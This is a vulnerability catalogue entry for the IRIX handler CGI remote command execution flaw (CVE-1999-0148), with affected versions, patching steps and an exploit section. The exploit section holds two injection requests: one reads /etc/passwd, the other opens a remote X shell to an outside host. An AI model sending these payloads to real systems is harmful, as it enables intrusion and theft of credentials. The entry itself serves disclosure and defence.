Handler Check

Vulnerability Description

Brief description: IRIX handler CGI allows remote command execution

Full description: The handler cgi-bin program contains a vulnerability that allows a remote attacker to execute arbitrary commands on a web server. The handler program is part of the Outbox Environment Subsystem for IRIX, installed by default on all SGI systems running IRIX 6.2 or newer. Older versions of IRIX may have this package optionally installed.

Components: Common Gateway Interface (CGI)

Systems: IRIX 5.3, IRIX 6.0, IRIX 6.0.1, IRIX 6.1, IRIX 6.2, IRIX 6.3, IRIX 6.4

Effect(s) of exploiting: The remote user can execute commands with the privileges of the web server.

Detecting the hole:

    1. See if you are running an unpatched handler on one of the systems. If so, you are vulnerable.

Fixing the hole:

    For IRIX 5.3 and later:
    1. Disable the scripts included with the IRIX Outbox Environment Subsystem and obtain the patch(es) made available by SGI.
    1. Log in as root on the vulnerable machine
    2. Assuming the default installation path of /var/www , type: 
      # /bin/chmod 400 /var/www/cgi-bin/handler
    3. Now delete the outbox system: 
      # /usr/sbin/versions -v remove outbox
    4. Install the patch for your system, or upgrade.
    2. For IRIX 5.2 and earlier, either upgrade or disable the service. The following disables the service:
    1. Log in as root on the vulnerable machine
    2. Edit the file /etc/syslog.conf . Change the line 
      *.crit                  |/var/adm/sysmonpp      /var/adm/SYSLOG
      to 
      #*.crit                  |/var/adm/sysmonpp      /var/adm/SYSLOG
      The leading # prevents syslogd (8) from honoring the line (and the sysmonpp (8) program).
    3. Force syslogd to re-read the configuration file: 
      # /etc/killall -HUP syslogd

Other information:

Keywords

Cataloguing

PA Classification(s):

RISOS Classification(s):

DCS Classification(s):

CVE Number: CVE-1999-0148 -- The handler CGI program in IRIX allows arbitrary command execution.

Exploit Information

Attack: Connect to the web server on the target system and enter either of the following (where <TAB> is a tab character): 

GET<TAB>/cgi-bin/handler/whatever;cat<TAB>/etc/passwd|<TAB>?data=Download HTTP/1.0
or 
GET<TAB>/cgi-bin/handler/blah;/usr/sbin/xwsh<TAB>-display<TAB>yourhost.com|?data=Download

Related Information

SGI has patches for IRIX 5.3 , IRIX 6.2 , IRIX 6.3 , IRIX 6.4 .

Advisories: Silicon Graphics Inc. Security Advisory 19970501-02-PX, IRIX webdist.cgi, handler and wrap programs ; ISS X-Force database entry http-sgi-handler ; Security Focus database entry 380

Related Vulnerabilities:

Reportage

Reporting: Razvan Dragomirescu in Bugtraq (June 16, 1997 )

Revision Number 1

  1. Stacey Anderson (Sunday, July 2, 2000):
    Initial entry